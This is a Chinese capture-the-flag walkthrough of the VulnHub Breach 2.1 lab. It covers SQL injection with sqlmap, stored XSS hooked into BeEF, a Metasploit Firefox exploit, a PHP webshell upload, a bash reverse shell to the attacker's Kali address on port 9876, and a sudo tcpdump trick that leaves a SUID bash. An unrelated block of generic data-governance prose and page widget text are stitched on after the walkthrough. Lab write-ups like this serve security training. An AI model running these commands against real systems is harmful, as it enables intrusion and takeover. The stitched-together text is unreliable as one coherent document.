vulnhub-Breach 2.1靶机

vulnhub:https://www.vulnhub.com/entry/breach-21,159/

导入靶机,注意该靶机配置的是静态IP(192.168.110.151),所以必须设置网卡在192.168.110.0/24网段

image-20240918172357072

虽说我们知道靶机地址,但是为了验证网络配置是否正确,我们还是扫描一下确保靶机存活

image-20240918172722812

151存活,开始扫描端口(这个靶机端口很怪,服务也不常见,所以要加参数)

nmap -sV -p- 192.168.110.151

image-20240918173046292

开了三个端口,只有SSH服务我们比较常用,没有网站服务所以直接上手SSH

ssh 192.168.110.151 -p 65535(并非SSH默认端口,所以要用-p参数指定端口连接)

image-20240918173300432

弹出了一段信息,比较有用的是第四行,给出了peter账户,并且有一个灯下黑的密码"inthesource"

ssh peter@192.168.110.151 -p 65535

image-20240918173529509

输入密码之后直接关闭连接,和之前做的一个靶机非常像,但是没有弹出错误提示说明密码正确,尝试指定/bin/bash也不起作用,再次收集端口信息

image-20240918173947714

多出来一个80端口,开着http服务,那么就可以再来正常流程了

image-20240918174256050

想着看下元素还被BYD作者嘲讽了

image-20240918174331083

没什么信息的常规做法就是目录爆破,个人喜欢dirsearch

image-20240918174634101

扫到一个blog页面,访问

image-20240918174700454

网站存在一个搜索框,看到这个一般就会考虑XSS或者搜索型SQL注入,尝试发现确实存在SQL注入(输入单引号会导致不输出结果条数,正常至少输出一个0)

image-20240918174824766

使用sqlmap来爆破数据库

python3 sqlmap.py -u http://192.168.110.151/blog/index.php?search=1 --batch

确认确实存在SQL注入后开始获取信息

存在一个数据库oscommerce,下面有个表osc_administrators,很明显是账户信息

image-20240918175257013

这个密码应该是MD5加密,尝试用在线工具解密

image-20240918175349579

解出来密码是32admin

image-20240918175536632

在登陆界面发现并不是网站的账号密码

之后根据遇见框就测试原理,测出来注册界面存在存储型XSS漏洞(把XSS代码写进用户名,点击Members查看已注册用户会发现执行)

image-20240918180120896

我们可以使用BEEF平台来利用XSS漏洞

image-20240918180523286

开启beef的时候会给出上线的XSS命令,使用时要改成kaliIP

image-20240918180601694

如果刚才尝试过XSS导致注册按钮消失了,删除Cookie就行

image-20240918180708875

点击Members后kali会上线,靶机需要过一会才会上线

image-20240918182122216

上线之后我们可以查看靶机浏览器信息,是火狐15,根据这个信息我们可以查找存在的漏洞

searchsploit firefox 15

image-20240918182232188

可以看到找到了比较符合我们情况的漏洞,并且可以msf利用

msfconsole

search firefox 15

use 12

image-20240918182416289

选择模块后查看需要的设置(建议设置URIPATH)

image-20240918182553520

启动模块

image-20240918182618242

http://192.168.110.128:8080/grass

在BEEF中给靶机设置重定向到生成的URL,执行(靶机会隔一会就下线,需要重新上线,所以可能要多试几次)

image-20240918182935001

image-20240918183722126

选择会话

image-20240918183801878

这个获取的shell不稳定且不好用,利用msf其他模块获取一个新的shell

search post shell to meterpreter

use post/multi/manage/shell_to_meterpreter

设置lhost 和 session,运行(如果之前的session掉了,那就再获取一个吧,没法子)

image-20240918184308703

顺利的话,可以看到多了个meterpeter类型的session,这个时候选用他就很稳定了(注意要先输入shell)

image-20240918184412685

获取一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240918184519248

翻找之后没有发现可以利用的sudo和suid提权,那我们先尝试解决ssh无法连接的问题

按照之前的经验,多半是bashrc文件的问题,直接覆盖

echo 'exec /bin/bash' > .bashrc

确实可以连接了,输入密码后会没有反应,按ctrl+c即可进入shell

image-20240918185149201

可以看到home目录下还有两个用户,不过目前我们是没法切换的

image-20240918185350807

查看一下靶机端口状态

image-20240918185500232

看到还有一个2323端口我们之前扫不出来,尝试用各种方式访问一下,发现telnet可以显示一些信息

image-20240918185602000

给出了一个坐标,经查询是Houston(休士顿,我们遇到麻烦了),估计是个密码(毕竟这里已经显示让登录了)

目前已知三个账户,都尝试一下发现是milton

image-20240918185843333

问了我们一个问题,翻译过来是:这个订书机是谁的

返回peter的shell,查询文件信息里带stapler的文件,查到/usr/local/bin/cd.py

image-20240918190149224

根据程序逻辑,答案是mine

image-20240918190220373

常规提权还是没有权限,查看我们有什么文件

发现家目录下有个.profile文件,当我们尝试sudo的时候就会弹出不让用的信息

image-20240918190449113

注释掉这几行,再次尝试

image-20240918190612519

好吧还是不行,但是根据刚才那个文件,这个账户的sudo权限也不能拿来提权

在这个账户查看,发现还有个8888端口

image-20240918190831412

image-20240918190856161

点进oscommerce,发现一个网站

image-20240918191003546

偶然发现/admin页面可以登录

image-20240918191042760

之前翻网页配置的时候找到了mysql的配置文件,没有设置密码,所以可以直接登录

image-20240918191212069

突然想起来我们一开始就爆到这个网站的密码了(哪个数据库和这个网站名字一样)

试了一下不对,又去数据库翻了一下也没啥,结果密码就是admin,可能之前数据库里拿出来的那个32有别的作用并非密码本身

image-20240918191427451

网站存在文件上传功能点

image-20240918191547350

文件上传路径为/includes/work,写个一句话木马传上去(eval不能用,建议system)

image-20240918191757759

image-20240918192705281

使用反弹shell命令反弹到kali的9876端口,kali监听

http://192.168.110.151:8888/oscommerce/includes/work/shell.php?cmd=/bin/bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.110.128/9876%200%3E%261%27

image-20240918192940814

小提权

which python
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

发现这个账户存在sudo无密码命令,并且可以用于提权

image-20240918193038127

image-20240918193150828

根据提权命令

cd /tmp echo '#!/bin/bash' >> 1.sh echo 'cp /bin/bash /tmp/shell' >> 1.sh echo 'chmod +s /tmp/shell' >> 1.sh chmod +x 1.sh sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/1.sh -Z root

image-20240918195201822

在之前的milton用户shell构造本地流量

telnet 127.0.0.1 2323

回到blumbergh

./shell -p

image-20240918195315391

至此完成提权

数据治理是确保数据准确性、可靠性、安全性、可用性和完整性的体系和框架。它定义了组织内部如何使用、存储、保护和共享数据的规则和流程。数据治理的重要性随着数字化转型的加速而日益凸显,它能够提高决策效率、增强业务竞争力、降低风险,并促进业务创新。有效的数据治理体系可以确保数据在采集、存储、处理、共享和保护等环节的合规性和有效性。 数据质量管理是数据治理中的关键环节,它涉及数据质量评估、数据清洗、标准化和监控。高质量的数据能够提升业务决策的准确性,优化业务流程,并挖掘潜在的商业价值。随着大数据和人工智能技术的发展,数据质量管理在确保数据准确性和可靠性方面的作用愈发重要。企业需要建立完善的数据质量管理和校验机制,并通过数据清洗和标准化提高数据质量。 数据安全与隐私保护是数据治理中的另一个重要领域。随着数据量的快速增长和互联网技术的迅速发展,数据安全与隐私保护面临前所未有的挑战。企业需要加强数据安全与隐私保护的法律法规和技术手段,采用数据加密、脱敏和备份恢复等技术手段,以及加强培训和教育,提高安全意识和技能水平。 数据流程管理与监控是确保数据质量、提高数据利用率、保护数据安全的重要环节。有效的数据流程管理可以确保数据流程的合规性和高效性,而实时监控则有助于及时发现并解决潜在问题。企业需要设计合理的数据流程架构,制定详细的数据管理流程规范,并运用数据审计和可视化技术手段进行监控。 数据资产管理是将数据视为组织的重要资产,通过有效的管理和利用,为组织带来经济价值。数据资产管理涵盖数据的整个生命周期,包括数据的创建、存储、处理、共享、使用和保护。它面临的挑战包括数据量的快速增长、数据类型的多样化和数据更新的迅速性。组织需要建立完善的数据管理体系,提高数据处理和分析能力,以应对这些挑战。同时,数据资产的分类与评估、共享与使用规范也是数据资产管理的重要组成部分,需要制定合理的标准和规范,确保数据共享的安全性和隐私保护,以及建立合理的利益分配和权益保障机制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值